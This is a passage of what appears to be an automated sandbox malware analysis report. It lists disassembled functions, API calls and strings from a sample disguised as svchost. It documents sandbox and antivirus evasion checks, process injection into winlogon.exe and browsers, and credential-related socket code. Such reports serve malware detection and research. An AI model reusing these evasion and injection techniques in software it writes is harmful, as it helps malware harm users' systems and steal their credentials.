                                                                                                                                                                                                            • SymSetOptions.DBGHELP(00000006), ref: 02C73AB4
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C73AC4
                                                                                                                                                                                                            • SymInitialize.DBGHELP(00000000), ref: 02C73AC7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 02C73B05
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C73B90
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73BAE
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C73C44
                                                                                                                                                                                                            • ZwQueryInformationThread.NTDLL(00000000), ref: 02C73C4B
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 02C73C88
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • HH;mm;ss, xrefs: 02C73E12
                                                                                                                                                                                                            • debug_%s_%s.log, xrefs: 02C73E34
                                                                                                                                                                                                            • dd;MMM;yyyy, xrefs: 02C73DED
                                                                                                                                                                                                            • sysinfo.log, xrefs: 02C73ED8
                                                                                                                                                                                                            • ThreadStart = , xrefs: 02C73C60
                                                                                                                                                                                                            • csm, xrefs: 02C73965
                                                                                                                                                                                                            • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C73BA7
                                                                                                                                                                                                            • main, xrefs: 02C73B57
                                                                                                                                                                                                            • scr.bmp, xrefs: 02C73F58
                                                                                                                                                                                                            • CallStack:, xrefs: 02C73CBD
                                                                                                                                                                                                            • DEBUG, xrefs: 02C73FAD
                                                                                                                                                                                                            • Self exception = TRUE, xrefs: 02C73BF8
                                                                                                                                                                                                            • ExceptionAddress = , xrefs: 02C73AD4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentQueryVirtual$Process$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                            • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                            • API String ID: 3375037927-1369666974
                                                                                                                                                                                                            • Opcode ID: ac3fec414610f6108b4739e17ac95429ad56976481f4b4802917928903d1c8c8
                                                                                                                                                                                                            • Instruction ID: 506229e922478522f59c4e797cef5f4b2d10b56b102a1ea82a7b136c19998999
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac3fec414610f6108b4739e17ac95429ad56976481f4b4802917928903d1c8c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6622C470E406859FDB15CF68C894BAABBF5FF89300F2486D9E949EB340D731AA45CB50
                                                                                                                                                                                                            Function 00402C10 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 940 402c10-402c42 LoadLibraryA GetModuleFileNameA call 403900 943 402c44-402c46 ExitProcess 940->943 944 402c4c-402c67 call 4020b0 call 401fc0 FindWindowA 940->944 949 402c81-402c9f call 402240 call 402330 call 402420 call 402560 IsUserAnAdmin 944->949 950 402c69-402c7b GetTickCount PostMessageA 944->950 959 402ca1-402ca8 call 401d80 949->959 960 402cc3-402cdb IsUserAnAdmin GetModuleHandleA 949->960 950->949 970 402cb2-402cb9 call 403440 959->970 971 402caa-402cac ExitProcess 959->971 962 402cfc-402d00 960->962 963 402cdd-402ced GetProcAddress 960->963 964 402d02-402d04 962->964 965 402d4e-402d50 962->965 963->962 967 402cef-402cf9 GetCurrentProcess 963->967 968 402d06-402d1a StrStrIA 964->968 969 402d1c-402d3a call 402810 GetCurrentProcessId call 401580 Sleep 964->969 972 402d56-402d6a StrStrIA 965->972 973 402ddd-402df6 call 402810 GlobalFindAtomA 965->973 967->962 968->969 974 402d3f-402d49 call 402950 call 4011c0 968->974 989 402e38-402e3a ExitProcess 969->989 970->960 992 402cbb-402cbd ExitProcess 970->992 978 402d81-402d94 call 402950 GlobalFindAtomA 972->978 979 402d6c-402d7c call 402810 call 4027b0 972->979 973->989 990 402df8-402e07 GlobalAddAtomA IsUserAnAdmin 973->990 974->989 995 402dd6-402ddb call 4011c0 978->995 996 402d96-402da5 GlobalAddAtomA IsUserAnAdmin 978->996 979->989 997 402e19-402e22 IsUserAnAdmin 990->997 998 402e09-402e11 990->998 995->989 1002 402db7-402dc0 IsUserAnAdmin 996->1002 1003 402da7-402daf 996->1003 1004 402e24 997->1004 1005 402e29-402e31 call 4014b0 997->1005 998->997 1008 402dc2 1002->1008 1009 402dc7-402dcf call 4014b0 1002->1009 1003->1002 1004->1005 1005->989 1014 402e33 call 401580 1005->1014 1008->1009 1009->995 1015 402dd1 call 401580 1009->1015 1014->989 1015->995
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                              • Part of subcall function 00403900: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                              • Part of subcall function 00403900: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                              • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                              • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                              • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                              • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                              • Part of subcall function 00403900: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                              • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$PnEw$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-3887202299
                                                                                                                                                                                                            • Opcode ID: 3c08cf3795012a32fe98e21dd2af2de8b387599ae1b272b10eb404c49b26478c
                                                                                                                                                                                                            • Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c08cf3795012a32fe98e21dd2af2de8b387599ae1b272b10eb404c49b26478c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD
                                                                                                                                                                                                            Function 00403900 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167
                                                                                                                                                                                                            • Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                            • Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8
                                                                                                                                                                                                            Function 02C888F0 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                            • String ID: login$pass
                                                                                                                                                                                                            • API String ID: 1705285421-2248183487
                                                                                                                                                                                                            • Opcode ID: 0814016945f0639cc30ea48f27b4ddf5a410ef03c0ada2c7d2801af701cddf6e
                                                                                                                                                                                                            • Instruction ID: f33e156e8bc8c7f92e80d3e6d955723e872460550b0affbafca1c6be28475b8d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0814016945f0639cc30ea48f27b4ddf5a410ef03c0ada2c7d2801af701cddf6e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D451AE75984340AFC302DF64E888B6ABBE8FF88724F448B1DF965972C0D7709519CB62
                                                                                                                                                                                                            Function 02C864A0 Relevance: 40.8, APIs: 27, Instructions: 290memorytimesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C86370: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                              • Part of subcall function 02C86370: Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                              • Part of subcall function 02C86370: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                              • Part of subcall function 02C86370: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                              • Part of subcall function 02C86370: EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                              • Part of subcall function 02C86370: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                              • Part of subcall function 02C86370: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                              • Part of subcall function 02C86370: LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                              • Part of subcall function 02C86370: Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                              • Part of subcall function 02C86370: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                              • Part of subcall function 02C86370: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                            • OpenProcess.KERNEL32 ref: 02C86510
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86534
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C86558
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8656A
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86575
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86594
                                                                                                                                                                                                            • OpenProcess.KERNEL32(?,00001400,?), ref: 02C86610
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86631
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,FFFFFFFF), ref: 02C86655
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C86667
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86672
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86698
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C866E6
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C86731
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD8A0,?,?), ref: 02C86770
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C8677A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C86781
                                                                                                                                                                                                            • OpenProcess.KERNEL32(?,00001400,?), ref: 02C867D0
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C867F3
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00001400), ref: 02C8681B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C8682D
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C8684D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8687A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C86881
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8688D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C86894
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02C868A0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process$CriticalHandleHeapSection$CloseEnterInformationLeave$OpenTimes$AllocProcess32QueryVirtual$CreateCurrentFirstFreeNextSleepSnapshotToolhelp32Validate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1045582906-0
                                                                                                                                                                                                            • Opcode ID: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                            • Instruction ID: c6614f8cda1026375bc89473445eaafcaf29e54397b90c84eaf1897da800079e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83C1E5B0948391AFD321DF65C884A5AFBE8BFC8B14F208A5EF59A87240D770D545CF92
                                                                                                                                                                                                            Function 02C766D0 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215memoryfilestringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,02C92BB9,75495CE0), ref: 02C7670B
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C76712
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7672A
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76739
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 02C76761
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                            • API String ID: 2617121151-1173974218
                                                                                                                                                                                                            • Opcode ID: 08f605f3dea216708c9ac44273907c8a67f20b2d80d1f0db99049bcdb3fcf0bf
                                                                                                                                                                                                            • Instruction ID: 7becebad95b7428ba07262907e1d3278c4549d4a02366af0e28626690a94c87c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08f605f3dea216708c9ac44273907c8a67f20b2d80d1f0db99049bcdb3fcf0bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00616A71E447865BC7224F309C98BA77FADEF81754F244A54F9819B282DB31D60CC791
                                                                                                                                                                                                            Function 00401580 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                              • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                              • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 3542510048-3024904723
                                                                                                                                                                                                            • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                            Function 02C93240 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211injectionlibrarymemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C93B50: memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                              • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02C93B87
                                                                                                                                                                                                              • Part of subcall function 02C93B50: GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                              • Part of subcall function 02C93B50: SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                              • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                              • Part of subcall function 02C93B50: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                              • Part of subcall function 02C93B50: CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02C9327F
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02C9329E
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932BD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C932D3
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02C932DF
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932FA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C9330A
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02C93344
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02C93365
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C93391
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02C933A9
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02C933C4
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02C933D2
